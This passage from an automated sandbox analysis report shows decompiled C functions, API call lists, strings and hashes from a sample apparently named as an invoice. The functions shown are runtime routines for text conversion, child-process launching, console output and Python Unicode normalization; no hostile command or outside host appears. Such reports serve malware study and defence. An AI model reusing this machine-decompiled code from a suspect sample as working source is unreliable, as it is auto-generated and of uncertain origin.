                            									if(_t36 >= _t44) {
                            										goto L16;
                            									} else {
                            										_t21 =  *(_t47 + 0x20);
                            										continue;
                            									}
                            								}
                            							}
                            							goto L17;
                            						}
                            						_push("Failed to get UTF-8 buffer size.\n");
                            						goto L12;
                            					}
                            				} else {
                            					return _t18;
                            				}
                            				L17:
                            			}


                            APIs
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000), ref: 01314A69
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000), ref: 01314A9E
                            Strings
                            • Out of memory., xrefs: 01314AC7
                            • win32_utils_to_utf8, xrefs: 01314ACC
                            • WideCharToMultiByte, xrefs: 01314AD8
                            • Failed to encode wchar_t as UTF-8., xrefs: 01314AC0
                            • Failed to get UTF-8 buffer size., xrefs: 01314AD3
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide
                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                            • API String ID: 626452242-3595433791
                            • Opcode ID: 118798e4498cc4779df6ba9b77aebd3484142f0546e4a6e427ad22b0c73ec6ab
                            • Instruction ID: 24d09bccea73a06958486961889e97851e68b99eb56601e1a8d8881c2db67000
                            • Opcode Fuzzy Hash: 118798e4498cc4779df6ba9b77aebd3484142f0546e4a6e427ad22b0c73ec6ab
                            • Instruction Fuzzy Hash: AC3182727843066BEB24AE5CAC41F5677D4EB40B1DF010139FE54B72C4E776E40483A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 62%
                            			E01314400(void* __edx, void* __ebp, void* __eflags, struct _SECURITY_ATTRIBUTES _a4, struct _SECURITY_ATTRIBUTES* _a8, int _a12, struct _PROCESS_INFORMATION _a16, struct _STARTUPINFOW _a32, struct _SECURITY_ATTRIBUTES* _a36, struct _SECURITY_ATTRIBUTES* _a40, struct _SECURITY_ATTRIBUTES* _a44, intOrPtr _a76, short _a80, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, short _a100, signed int _a8292, intOrPtr _a8300) {
                            				struct _SECURITY_ATTRIBUTES* _v0;
                            				signed int _t26;
                            				intOrPtr _t45;
                            				signed int _t53;
                            				signed int _t64;
                            				DWORD* _t66;
                            				void* _t70;
                            
                            				_t70 = __eflags;
                            				_t62 = __edx;
                            				E01317880();
                            				_t26 =  *0x133c008; // 0xa212446c
                            				_a8292 = _t26 ^ _t64;
                            				_v0 = 0;
                            				E01314BF0( &_a100, _a8300, 0x1000);
                            				_push(1);
                            				_push(0x16);
                            				E0131EDBE(__edx, _t70);
                            				_push(1);
                            				_push(2);
                            				E0131EDBE(__edx, _t70);
                            				_push(1);
                            				_push(0xf);
                            				E0131EDBE(__edx, _t70);
                            				_push(1);
                            				_push(0x15);
                            				E0131EDBE(_t62, _t70);
                            				_a4.nLength = 0xc;
                            				_a8 = 0;
                            				_a12 = 1;
                            				GetStartupInfoW( &_a32);
                            				_a36 = 0;
                            				_a40 = 0;
                            				_a44 = 0;
                            				_a76 = 0x101;
                            				_a80 = 1;
                            				_a88 = E0131E926(E013209C5(E0131A7EB(0)));
                            				_a92 = E0131E926(E013209C5(E0131A7EB(1)));
                            				_t45 = E0131E926(E013209C5(E0131A7EB(2)));
                            				_t66 = _t64 + 0x50;
                            				_a96 = _t45;
                            				if(CreateProcessW( &_a100, GetCommandLineW(),  &_a4, 0, 1, 0, 0, 0,  &_a32,  &_a16) == 0) {
                            					_push("Error creating child process!\n");
                            					_push("CreateProcessW");
                            					_t53 = E01311860(_t62, __eflags) | 0xffffffff;
                            					__eflags = _t53;
                            					E0131786A();
                            					return _t53;
                            				} else {
                            					WaitForSingleObject(_a16.hProcess, 0xffffffff);
                            					GetExitCodeProcess(_a16, _t66);
                            					E0131786A();
                            					return _v0;
                            				}
                            			}


                            APIs
                              • Part of subcall function 01314BF0: MultiByteToWideChar.KERNEL32(0000FDE9,?,?,000000FF,?,?,?,?,01314117,?,?,00001000), ref: 01314C08
                              • Part of subcall function 0131EDBE: SetConsoleCtrlHandler.KERNEL32(0131EA12,00000001,0133A620,00000018,01314440,00000016,00000001,?,?,00001000,013126B4,?,00000000), ref: 0131EED7
                              • Part of subcall function 0131EDBE: GetLastError.KERNEL32 ref: 0131EEF1
                            • GetStartupInfoW.KERNEL32(?), ref: 0131447B
                            • GetCommandLineW.KERNEL32(?,00000000,00000001,00000000,00000000,00000000,?,?), ref: 0131450C
                            • CreateProcessW.KERNEL32 ref: 0131451B
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0131452B
                            • GetExitCodeProcess.KERNEL32 ref: 01314539
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Process$ByteCharCodeCommandConsoleCreateCtrlErrorExitHandlerInfoLastLineMultiObjectSingleStartupWaitWide
                            • String ID: CreateProcessW$Error creating child process!
                            • API String ID: 1248179626-3524285272
                            • Opcode ID: d27dc5de27e4ee249f312bb5fbd292daae5f22da85d53ee6242b10a89d4854a4
                            • Instruction ID: 704bdd1a0a04bcccce030a883fd89d491b60972c8002e2a6817eb0aaaaccf1b2
                            • Opcode Fuzzy Hash: d27dc5de27e4ee249f312bb5fbd292daae5f22da85d53ee6242b10a89d4854a4
                            • Instruction Fuzzy Hash: C9319670504345ABE724AB78CC4EF8FB6E8AF54708F004919F985A72C4DBB9D144CB56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 33%
                            			E01314C90(char* _a4, short* _a8, int _a12) {
                            				void* _t17;
                            				void* _t18;
                            				int _t19;
                            				char* _t20;
                            				void* _t21;
                            
                            				_t20 = _a4;
                            				if(_t20 != 0) {
                            					_t19 = _a12;
                            					goto L6;
                            				} else {
                            					_t19 = WideCharToMultiByte(0xfde9, _t20, _a8, 0xffffffff, _t20, _t20, _t20, _t20);
                            					_t26 = _t19;
                            					if(_t19 != 0) {
                            						_t3 = _t19 + 1; // 0x1
                            						_push(1);
                            						_t20 = E013197F8(_t17);
                            						_t21 = _t21 + 8;
                            						__eflags = _t20;
                            						if(__eflags != 0) {
                            							L6:
                            							__eflags = WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff, _t20, _t19, 0, 0);
                            							if(__eflags != 0) {
                            								return _t20;
                            							} else {
                            								_push("Failed to encode wchar_t as UTF-8.\n");
                            								_push("WideCharToMultiByte");
                            								E01311860(_t18, __eflags);
                            								__eflags = 0;
                            								return 0;
                            							}
                            						} else {
                            							_push("Out of memory.");
                            							_push("win32_utils_to_utf8");
                            							E01311860(_t18, __eflags);
                            							__eflags = 0;
                            							return 0;
                            						}
                            					} else {
                            						_push("Failed to get UTF-8 buffer size.\n");
                            						_push("WideCharToMultiByte");
                            						E01311860(_t18, _t26);
                            						return 0;
                            					}
                            				}
                            			}


                            APIs
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,013148EC,An attempt to set the process default activation context failed because the process default activation context was already set.,?,00001000,?,?), ref: 01314CAA
                              • Part of subcall function 01311860: GetLastError.KERNEL32(?,?), ref: 0131187D
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,00000000,013148EC,An attempt to set the process default activation context failed because the process default activation context was already set.,?,00001000,?,?), ref: 01314D0F
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                            • API String ID: 1717984340-3595433791
                            • Opcode ID: e42cfaba25fa1041fc4ffa0a063112d0061c4d226785625929944f32848bc7df
                            • Instruction ID: 1ec15ea0bded8a1228b1423270a4caae19ab23d71fe9e0c9a6ca48847eb2c96d
                            • Opcode Fuzzy Hash: e42cfaba25fa1041fc4ffa0a063112d0061c4d226785625929944f32848bc7df
                            • Instruction Fuzzy Hash: EE01F93779533676CA3161AF7C09FCB6AD9CFD1BB9F150225FA18F2288D650940282F5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 85%
                            			E0132D04A(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
                            				signed int _v8;
                            				char _v22;
                            				struct _cpinfo _v28;
                            				short* _v32;
                            				int _v36;
                            				char* _v40;
                            				int _v44;
                            				intOrPtr _v48;
                            				void* _v60;
                            				signed int _t63;
                            				short* _t68;
                            				int _t69;
                            				signed int _t71;
                            				short* _t72;
                            				signed int _t75;
                            				short* _t85;
                            				int _t93;
                            				intOrPtr _t96;
                            				intOrPtr _t97;
                            				signed int _t107;
                            				char* _t109;
                            				char* _t110;
                            				void* _t115;
                            				void* _t116;
                            				intOrPtr _t117;
                            				intOrPtr _t118;
                            				intOrPtr* _t120;
                            				short* _t122;
                            				int _t124;
                            				int _t126;
                            				short* _t127;
                            				intOrPtr* _t128;
                            				signed int _t129;
                            				short* _t130;
                            
                            				_t63 =  *0x133c008; // 0xa212446c
                            				_v8 = _t63 ^ _t129;
                            				_t124 = _a20;
                            				_v44 = _a4;
                            				_v48 = _a8;
                            				_t67 = _a24;
                            				_v40 = _a24;
                            				_t120 = _a16;
                            				_v36 = _t120;
                            				if(_t124 <= 0) {
                            					if(_t124 >= 0xffffffff) {
                            						goto L2;
                            					} else {
                            						goto L5;
                            					}
                            				} else {
                            					_t124 = E0132CA63(_t120, _t124);
                            					_t67 = _v40;
                            					L2:
                            					_t93 = _a28;
                            					if(_t93 <= 0) {
                            						if(_t93 < 0xffffffff) {
                            							goto L5;
                            						} else {
                            							goto L7;
                            						}
                            					} else {
                            						_t93 = E0132CA63(_t67, _t93);
                            						L7:
                            						_t69 = _a32;
                            						if(_t69 == 0) {
                            							_t69 =  *( *_v44 + 8);
                            							_a32 = _t69;
                            						}
                            						if(_t124 == 0 || _t93 == 0) {
                            							if(_t124 != _t93) {
                            								if(_t93 <= 1) {
                            									if(_t124 <= 1) {
                            										if(GetCPInfo(_t69,  &_v28) == 0) {
                            											goto L5;
                            										} else {
                            											if(_t124 <= 0) {
                            												if(_t93 <= 0) {
                            													goto L36;
                            												} else {
                            													_t68 = 2;
                            													if(_v28 >= _t68) {
                            														_t109 =  &_v22;
                            														if(_v22 != 0) {
                            															_t128 = _v40;
                            															while(1) {
                            																_t117 =  *((intOrPtr*)(_t109 + 1));
                            																if(_t117 == 0) {
                            																	goto L15;
                            																}
                            																_t96 =  *_t128;
                            																if(_t96 <  *_t109 || _t96 > _t117) {
                            																	_t109 = _t109 + _t68;
                            																	if( *_t109 != 0) {
                            																		continue;
                            																	} else {
                            																		goto L15;
                            																	}
                            																}
                            																goto L63;
                            															}
                            														}
                            													}
                            													goto L15;
                            												}
                            											} else {
                            												_t68 = 2;
                            												if(_v28 >= _t68) {
                            													_t110 =  &_v22;
                            													if(_v22 != 0) {
                            														while(1) {
                            															_t118 =  *((intOrPtr*)(_t110 + 1));
                            															if(_t118 == 0) {
                            																goto L17;
                            															}
                            															_t97 =  *_t120;
                            															if(_t97 <  *_t110 || _t97 > _t118) {
                            																_t110 = _t110 + _t68;
                            																if( *_t110 != 0) {
                            																	continue;
                            																} else {
                            																	goto L17;
                            																}
                            															}
                            															goto L63;
                            														}
                            													}
                            												}
                            												goto L17;
                            											}
                            										}
                            									} else {
                            										L17:
                            										_push(3);
                            										goto L13;
                            									}
                            								} else {
                            									L15:
                            									_t68 = 1;
                            								}
                            							} else {
                            								_push(2);
                            								L13:
                            								_pop(_t68);
                            							}
                            						} else {
                            							L36:
                            							_t122 = 0;
                            							_t71 = MultiByteToWideChar(_a32, 9, _v36, _t124, 0, 0);
                            							_v44 = _t71;
                            							if(_t71 == 0) {
                            								L5:
                            								_t68 = 0;
                            							} else {
                            								_t115 = _t71 + _t71;
                            								asm("sbb eax, eax");
                            								if((_t115 + 0x00000008 & _t71) == 0) {
                            									_t72 = 0;
                            									_v32 = 0;
                            									goto L45;
                            								} else {
                            									asm("sbb eax, eax");
                            									_t83 = _t71 & _t115 + 0x00000008;
                            									_t107 = _t115 + 8;
                            									if((_t71 & _t115 + 0x00000008) > 0x400) {
                            										asm("sbb eax, eax");
                            										_t85 = E01320A25(_t107, _t83 & _t107);
                            										_v32 = _t85;
                            										if(_t85 == 0) {
                            											goto L61;
                            										} else {
                            											 *_t85 = 0xdddd;
                            											goto L43;
                            										}
                            									} else {
                            										asm("sbb eax, eax");
                            										E0132F250();
                            										_t85 = _t130;
                            										_v32 = _t85;
                            										if(_t85 == 0) {
                            											L61:
                            											_t95 = _v32;
                            										} else {
                            											 *_t85 = 0xcccc;
                            											L43:
                            											_t72 =  &(_t85[4]);
                            											_v32 = _t72;
                            											L45:
                            											if(_t72 == 0) {
                            												goto L61;
                            											} else {
                            												_t126 = _a32;
                            												if(MultiByteToWideChar(_t126, 1, _v36, _t124, _t72, _v44) == 0) {
                            													goto L61;
                            												} else {
                            													_t75 = MultiByteToWideChar(_t126, 9, _v40, _t93, _t122, _t122);
                            													_v36 = _t75;
                            													if(_t75 == 0) {
                            														goto L61;
                            													} else {
                            														_t116 = _t75 + _t75;
                            														_t103 = _t116 + 8;
                            														asm("sbb eax, eax");
                            														if((_t116 + 0x00000008 & _t75) == 0) {
                            															_t127 = _t122;
                            															goto L56;
                            														} else {
                            															asm("sbb eax, eax");
                            															_t79 = _t75 & _t116 + 0x00000008;
                            															_t103 = _t116 + 8;
                            															if((_t75 & _t116 + 0x00000008) > 0x400) {
                            																asm("sbb eax, eax");
                            																_t127 = E01320A25(_t103, _t79 & _t103);
                            																_pop(_t103);
                            																if(_t127 == 0) {
                            																	goto L59;
                            																} else {
                            																	 *_t127 = 0xdddd;
                            																	goto L54;
                            																}
                            															} else {
                            																asm("sbb eax, eax");
                            																E0132F250();
                            																_t127 = _t130;
                            																if(_t127 == 0) {
                            																	L59:
                            																	_t95 = _v32;
                            																} else {
                            																	 *_t127 = 0xcccc;
                            																	L54:
                            																	_t127 =  &(_t127[4]);
                            																	L56:
                            																	if(_t127 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t93, _t127, _v36) == 0) {
                            																		goto L59;
                            																	} else {
                            																		_t95 = _v32;
                            																		_t122 = E013236EC(_t103, _v48, _a12, _v32, _v44, _t127, _v36, _t122, _t122, _t122);
                            																	}
                            																}
                            															}
                            														}
                            														E0132815E(_t127);
                            													}
                            												}
                            											}
                            										}
                            									}
                            								}
                            								E0132815E(_t95);
                            								_t68 = _t122;
                            							}
                            						}
                            					}
                            				}
                            				L63:
                            				E0131786A();
                            				return _t68;
                            			}

                            APIs
                            • GetCPInfo.KERNEL32(00000000,00000001,00000000,7FFFFFFF,?,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 0132D0F6
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0132D179
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0132D323,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0132D20C
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0132D223
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0132D29F
                            • __freea.LIBCMT ref: 0132D2CA
                            • __freea.LIBCMT ref: 0132D2D6
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                            • String ID:
                            • API String ID: 2829977744-0
                            • Opcode ID: 77d5d1e3a1191f2585c16a847cc7cf6791cd3a9ecea0306126bf493f5a5eed91
                            • Instruction ID: 4fc1b87ba5e2d5526e9c9426ab74f100526de1b2710f6937ebadfe2848311d60
                            • Opcode Fuzzy Hash: 77d5d1e3a1191f2585c16a847cc7cf6791cd3a9ecea0306126bf493f5a5eed91
                            • Instruction Fuzzy Hash: DD91D971E0032A9FEB25AEE8CC40EEEBBB9EF06768F148559E905E7150D735D841C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E01322A10(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                            				signed int _v8;
                            				signed char _v15;
                            				char _v16;
                            				void _v24;
                            				short _v28;
                            				char _v31;
                            				void _v32;
                            				long _v36;
                            				intOrPtr _v40;
                            				void* _v44;
                            				signed int _v48;
                            				signed char* _v52;
                            				long _v56;
                            				int _v60;
                            				void* __ebx;
                            				signed int _t78;
                            				signed int _t80;
                            				int _t86;
                            				void* _t93;
                            				long _t96;
                            				void _t104;
                            				void* _t111;
                            				signed int _t115;
                            				signed int _t118;
                            				signed char _t123;
                            				signed char _t128;
                            				intOrPtr _t129;
                            				signed int _t131;
                            				signed char* _t133;
                            				intOrPtr* _t136;
                            				signed int _t138;
                            				void* _t139;
                            
                            				_t78 =  *0x133c008; // 0xa212446c
                            				_v8 = _t78 ^ _t138;
                            				_t80 = _a8;
                            				_t118 = _t80 >> 6;
                            				_t115 = (_t80 & 0x0000003f) * 0x30;
                            				_t133 = _a12;
                            				_v52 = _t133;
                            				_v48 = _t118;
                            				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x1346108 + _t118 * 4)) + _t115 + 0x18));
                            				_v40 = _a16 + _t133;
                            				_t86 = GetConsoleCP();
                            				_t136 = _a4;
                            				_v60 = _t86;
                            				 *_t136 = 0;
                            				 *((intOrPtr*)(_t136 + 4)) = 0;
                            				 *((intOrPtr*)(_t136 + 8)) = 0;
                            				while(_t133 < _v40) {
                            					_v28 = 0;
                            					_v31 =  *_t133;
                            					_t129 =  *((intOrPtr*)(0x1346108 + _v48 * 4));
                            					_t123 =  *(_t129 + _t115 + 0x2d);
                            					if((_t123 & 0x00000004) == 0) {
                            						if(( *(E01327D33(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                            							_push(1);
                            							_push(_t133);
                            							goto L8;
                            						} else {
                            							if(_t133 >= _v40) {
                            								_t131 = _v48;
                            								 *((char*)( *((intOrPtr*)(0x1346108 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
                            								 *( *((intOrPtr*)(0x1346108 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x1346108 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
                            								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                            							} else {
                            								_t111 = E01323F5B( &_v28, _t133, 2);
                            								_t139 = _t139 + 0xc;
                            								if(_t111 != 0xffffffff) {
                            									_t133 =  &(_t133[1]);
                            									goto L9;
                            								}
                            							}
                            						}
                            					} else {
                            						_t128 = _t123 & 0x000000fb;
                            						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
                            						_push(2);
                            						_v15 = _t128;
                            						 *(_t129 + _t115 + 0x2d) = _t128;
                            						_push( &_v16);
                            						L8:
                            						_push( &_v28);
                            						_t93 = E01323F5B();
                            						_t139 = _t139 + 0xc;
                            						if(_t93 != 0xffffffff) {
                            							L9:
                            							_t133 =  &(_t133[1]);
                            							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                            							_v56 = _t96;
                            							if(_t96 != 0) {
                            								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
                            									L19:
                            									 *_t136 = GetLastError();
                            								} else {
                            									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
                            									if(_v36 >= _v56) {
                            										if(_v31 != 0xa) {
                            											goto L16;
                            										} else {
                            											_t104 = 0xd;
                            											_v32 = _t104;
                            											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                            												goto L19;
                            											} else {
                            												if(_v36 >= 1) {
                            													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
                            													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                            													goto L16;
                            												}
                            											}
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            					goto L20;
                            					L16:
                            				}
                            				L20:
                            				E0131786A();
                            				return _t136;
                            			}

                            APIs
                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,01323185,?,00000000,?,00000000,00000000), ref: 01322A52
                            • __fassign.LIBCMT ref: 01322ACD
                            • __fassign.LIBCMT ref: 01322AE8
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 01322B0E
                            • WriteFile.KERNEL32(?,?,00000000,01323185,00000000,?,?,?,?,?,?,?,?,?,01323185,?), ref: 01322B2D
                            • WriteFile.KERNEL32(?,?,00000001,01323185,00000000,?,?,?,?,?,?,?,?,?,01323185,?), ref: 01322B66
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                            • String ID:
                            • API String ID: 1324828854-0
                            • Opcode ID: 9f82d53c7932f6bdb7ef92b9339c56e1d5bbbb45b6c2ef89299796072e4e38fd
                            • Instruction ID: e85fe1460474c5779a6725feafb0ecf146e591fcf20f926945536de5fbb692c8
                            • Opcode Fuzzy Hash: 9f82d53c7932f6bdb7ef92b9339c56e1d5bbbb45b6c2ef89299796072e4e38fd
                            • Instruction Fuzzy Hash: DE51C0B1A00219AFDF24DFA8DC85AEEBBF8FF09314F14455AE955E7241D730A941CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 51%
                            			E6E2F37E0(void* __ecx, void* __edx, intOrPtr* _a4) {
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* _t3;
                            				void* _t6;
                            				void* _t9;
                            				void* _t26;
                            				intOrPtr* _t27;
                            
                            				_t27 = _a4;
                            				_t26 = __ecx;
                            				if( *((intOrPtr*)(_t27 + 8)) != 0) {
                            					__imp___PyUnicode_EqualToASCIIId(__edx, 0x6e3f8a28);
                            					__eflags = _t3;
                            					if(_t3 == 0) {
                            						__imp___PyUnicode_EqualToASCIIId(__edx, 0x6e3f8a34);
                            						__eflags = _t3;
                            						if(_t3 == 0) {
                            							__imp___PyUnicode_EqualToASCIIId(__edx, 0x6e3f837c);
                            							__eflags = _t3;
                            							if(_t3 == 0) {
                            								__imp___PyUnicode_EqualToASCIIId(__edx, 0x6e3f8370);
                            								__eflags = _t3;
                            								if(_t3 == 0) {
                            									__imp__PyErr_SetString( *__imp__PyExc_ValueError, "invalid normalization form");
                            									__eflags = 0;
                            									return 0;
                            								} else {
                            									_t6 = E6E2F3550(__ecx, _t27, 0, 1, 1);
                            									__eflags = _t6;
                            									if(_t6 == 0) {
                            										goto L1;
                            									} else {
                            										return E6E2F2A70(__edx, _t26, _t27, _t26, _t27, 1);
                            									}
                            								}
                            							} else {
                            								_t9 = E6E2F3550(__ecx, _t27, 0, 0, 1);
                            								__eflags = _t9;
                            								if(_t9 == 0) {
                            									goto L1;
                            								} else {
                            									return E6E2F2A70(__edx, _t26, _t27, _t26, _t27, 0);
                            								}
                            							}
                            						} else {
                            							__eflags = E6E2F3550(__ecx, _t27, 1, 1, 1);
                            							if(__eflags == 0) {
                            								goto L1;
                            							} else {
                            								return E6E2F3030(__edx, _t26, _t27, __eflags, _t26, _t27, 1);
                            							}
                            						}
                            					} else {
                            						__eflags = E6E2F3550(__ecx, _t27, 1, 0, 1);
                            						if(__eflags == 0) {
                            							goto L1;
                            						} else {
                            							return E6E2F3030(__edx, _t26, _t27, __eflags, _t26, _t27, 0);
                            						}
                            					}
                            				} else {
                            					L1:
                            					 *_t27 =  *_t27 + 1;
                            					return _t27;
                            				}
                            			}

                            APIs
                            • _PyUnicode_EqualToASCIIId.PYTHON38(?,6E3F8A28), ref: 6E2F3802
                            Strings
                            • invalid normalization form, xrefs: 6E2F38F1
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: EqualUnicode_
                            • String ID: invalid normalization form
                            • API String ID: 3822945493-2281882113
                            • Opcode ID: c599dc51f8004272abf1c06a13fb654f5fcbbaf3dc59d0efe019630a2080f0cf
                            • Instruction ID: f24ecd03c31b8a890e131a384ae9fb3a8d7c676673f3ca67f2bd2cc23aa96b9a
                            • Opcode Fuzzy Hash: c599dc51f8004272abf1c06a13fb654f5fcbbaf3dc59d0efe019630a2080f0cf
                            • Instruction Fuzzy Hash: AD31DF76BD010967FD1011A97C9ABABB74FEBC176FF140036FA09D92C1EA93D05681E2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _PyArg_BadArgument.PYTHON38(category,argument,a unicode character,?), ref: 6E2F1643
                            • _PyUnicode_Ready.PYTHON38(?), ref: 6E2F1658
                            • PyUnicode_FromString.PYTHON38 ref: 6E2F1742
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Unicode_$Arg_ArgumentFromReadyString
                            • String ID: a unicode character$argument$category
                            • API String ID: 3000140846-2068800536
                            • Opcode ID: 2340c8f7ea8ffafdc6fee6b14c5b6d4f79176588c13015ce15fd1852b6b20086
